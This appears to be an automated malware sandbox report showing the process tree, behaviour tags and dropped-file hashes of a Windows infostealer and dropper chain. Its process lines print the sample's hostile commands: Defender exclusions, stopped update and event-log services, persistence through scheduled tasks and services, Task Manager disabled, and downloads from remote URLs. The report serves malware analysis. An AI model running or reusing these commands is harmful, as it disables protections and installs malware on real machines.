PID 3584 wrote to memory of 4824	3584	legs.exe	RegAsm.exe
PID 3584 wrote to memory of 4824	3584	legs.exe	RegAsm.exe
PID 3584 wrote to memory of 4824	3584	legs.exe	RegAsm.exe
PID 3584 wrote to memory of 4824	3584	legs.exe	RegAsm.exe
PID 1980 wrote to memory of 4212	1980	cmd.exe	powershell.exe
PID 1980 wrote to memory of 4212	1980	cmd.exe	powershell.exe
PID 4212 wrote to memory of 3892	4212	powershell.exe	cmd.exe
PID 4212 wrote to memory of 3892	4212	powershell.exe	cmd.exe
PID 1980 wrote to memory of 4784	1980	cmd.exe	powershell.exe
PID 1980 wrote to memory of 4784	1980	cmd.exe	powershell.exe
PID 3892 wrote to memory of 4044	3892	cmd.exe	schtasks.exe
PID 3892 wrote to memory of 4044	3892	cmd.exe	schtasks.exe
PID 3892 wrote to memory of 2544	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 2544	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 952	3892	cmd.exe	schtasks.exe
PID 3892 wrote to memory of 952	3892	cmd.exe	schtasks.exe
PID 3892 wrote to memory of 4600	3892	cmd.exe	schtasks.exe
PID 3892 wrote to memory of 4600	3892	cmd.exe	schtasks.exe
PID 412 wrote to memory of 468	412	Hkbsse.exe	1.exe
PID 412 wrote to memory of 468	412	Hkbsse.exe	1.exe
PID 412 wrote to memory of 468	412	Hkbsse.exe	1.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe
"C:\Users\Admin\AppData\Local\Temp\c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3284

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1564

C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Users\Admin\AppData\Local\Temp\6.exe
"C:\Users\Admin\AppData\Local\Temp\6.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub
4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc6eaa3cb8,0x7ffc6eaa3cc8,0x7ffc6eaa3cd8
5⤵
PID:5004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
5⤵
PID:2400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
5⤵
PID:2336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
5⤵
PID:3752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
5⤵
PID:2668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
5⤵
PID:3024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
5⤵
PID:1284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3304 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
5⤵
PID:4044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
5⤵
PID:2800

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5616 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,1090031717807651078,5950998381244828439,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3868 /prefetch:2
5⤵
PID:5136

C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2668

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:2456

C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
3⤵
- Executes dropped EXE
PID:1804

C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4796

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:412

C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe
"C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 468 -s 388
6⤵
- Program crash
PID:1616

C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe"
5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1396

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:5336

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
7⤵
PID:2168

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
6⤵
- Launches sc.exe
PID:5352

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:4848

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
6⤵
- Launches sc.exe
PID:4784

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
6⤵
- Launches sc.exe
PID:5548

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
6⤵
- Launches sc.exe
PID:5636

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
6⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5684

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
6⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5692

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
6⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5700

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
6⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5712

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
6⤵
- Launches sc.exe
PID:5728

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
6⤵
- Launches sc.exe
PID:5888

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
6⤵
- Launches sc.exe
PID:5916

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
6⤵
- Launches sc.exe
PID:5948

C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3792

C:\Windows\SYSTEM32\cmd.exe
cmd /c ins.bat
4⤵
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
5⤵
- Scheduled Task/Job: Scheduled Task
PID:2480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
5⤵
- Scheduled Task/Job: Scheduled Task
PID:2944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4212

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
6⤵
- Suspicious use of WriteProcessMemory
PID:3892

C:\Windows\system32\schtasks.exe
schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
7⤵
- Scheduled Task/Job: Scheduled Task
PID:4044

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
7⤵
- Modifies registry key
PID:2544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
7⤵
- Scheduled Task/Job: Scheduled Task
PID:952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
7⤵
- Scheduled Task/Job: Scheduled Task
PID:4600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5456

C:\Windows\system32\schtasks.exe
schtasks /query /TN "Cleaner"
5⤵
PID:6008

C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe
"C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3584

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 252
4⤵
- Program crash
PID:3336

C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe
"C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3828

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
4⤵
PID:6040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3584 -ip 3584
1⤵
PID:956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 468 -ip 468
1⤵
PID:3500

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2832

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1284

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6096

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:6120

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5480

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:2736

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:6088

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:2676

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:6064

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:6108

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:2060

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:3024

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:376

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:776

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:4488

C:\Windows\explorer.exe
explorer.exe
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5220

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:6020

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:812

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
0646a15c4cb5150a0edcf949c1878bb1

SHA1
9849572b66b83a70655eba95315009f1dbb0c351

SHA256
8ef2230119a38411839a246d24220ed75b51d577c39551d2cd414401f425ba7d

SHA512
05e593642363dcc476375d04de882a652f8821da94e9a05a71c530728159064b07bfc5fae6154ad5da8e26f129aeddfed37f74713fd915b1859e8487a4165080

Download Submit
C:\Users\Admin\AppData\Local\Corporation.zip
Filesize
16.3MB

MD5
9cb5edb138b8df3492c0b14b56d617ac

SHA1
b02dfae970d31251d2f94cf14328f757ceb45c98

SHA256
de8c63974461298010c9b9c8a97e769f72f271e976bdbb54dee45264f8a0eda8

SHA512
50306f663098471c9aa51d9024bce4b8a25baec2fab2424909b481a4d223feda5311111831eb9084115686782c0c831f81ef5ccdb32b7a6833ff811ff51d4929

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
6486ee9e961a437dadb68ff1544d18a8

SHA1
05f4daccca0bc1ce73fe71ad2325ba5dadd3df25

SHA256
9a98b4686c9e90672a548c873943b3027fb111f7992263111d912318429f5834

SHA512
ee3659f68a46f37f340f98b85a7aa289e700c5ced2a4f0104673bb5f18cc82d1e9b838ec0278407213c6ed2073998e7aad78a7a39390b7e460c8e26dfa91d0e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
2dfecbb576ee9795c5284da8a2a3c7f5

SHA1
f1f0a6a97850aca2b4ab267a017564af02f24948

SHA256
dca6901942fa748fc01339192c0738a06847d8497c9c61298f1e5df1f8352fb0

SHA512
d664cc261113427810dd0b2d32763ddd08611a528fe6b285782d6b8ac03304b72a90fe7f3f7142e825ab8d948d5c9cf52f420546f3796b2ac23f3d00f3c17389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
179B

MD5
acb27da5871accd423ae23c5527dfe56

SHA1
d0bfb28a4bf124f04654a84a23134e2ac538b6b1

SHA256
7ecce8c1dc7a58271d4d8ba7e62b229a9d0ff7151b4865177b0a6ee1befaf001

SHA512
b789052a131b1843f1f8261ab4859e16b3cc852cb21c2392831d9e164c82a1b4a430d02ba0b2dff80473e959d5f578f6b2bfdf7d3bcf136cd311b192fa2ef43e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
b7c02cccdc0cd95efcd3ae860652c325

SHA1
e906edfbb44ea27cdb9f8aa42d0fd1b5ac2f8994

SHA256
7ea5d936cacee0a407fba40063777ed704a8207c5393e75506964d3f210c461a

SHA512
02ec6514dd8d27e38ad8a1d5db880b426d96dc5a0a0dc632c90e173ecb6beecd997f26212db6bdc772f1121703894f5bffb4126295a8ed80c16027573bf8e873

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
f52eb0cf1b86fba3072de88b27171a0a

SHA1
99ca18f2b78bdde5eff94b9fd4fab98fc0567877

SHA256
d938ceaf77cdeca0ca0172ebe388075f6db56075745f4d575baaf011fa8b9425

SHA512
6c43adc5338c0ec49735fd2760f10920759bb5b5d11c4fedc2ec2f826eff17289c645c708f988d3e1199296379ad3702752530b293c3c0ec468dd35b6dc1855a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
43a186da088700167c278f0504a4f438

SHA1
b10a951ad498dd5d9f10bfa535eb8a8468e7c900

SHA256
1fd86916d3da28419f9cc9bcf650f5bec6bcdfcd5c46ac2848f3e22807f776b8

SHA512
51c5d0efff582110fdf724d4bc007ae121cbcd61adaf4f70b5bbf5c327b21af12f837c3a42a41a4f3c0cb93826bd201a2f86d3555b612df5fd4fe3abcce6a51c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
17a60c9cac37cf5412f4cd266c22a435

SHA1
648aed53b8f323be19dfb75e1c61e9dd95fdd0fd

SHA256
de36be11adf1651810ebee5d6214786e3a6045ac7ee51730036385f504d4653d

SHA512
43c8160d5e32d6aeae36201e7580dfd2d47b53ceba28443b2aedefd32377448296ce805669b5136686378603af1348d58fb40a59b906c28aed2df6f7d98b4044

Download Submit
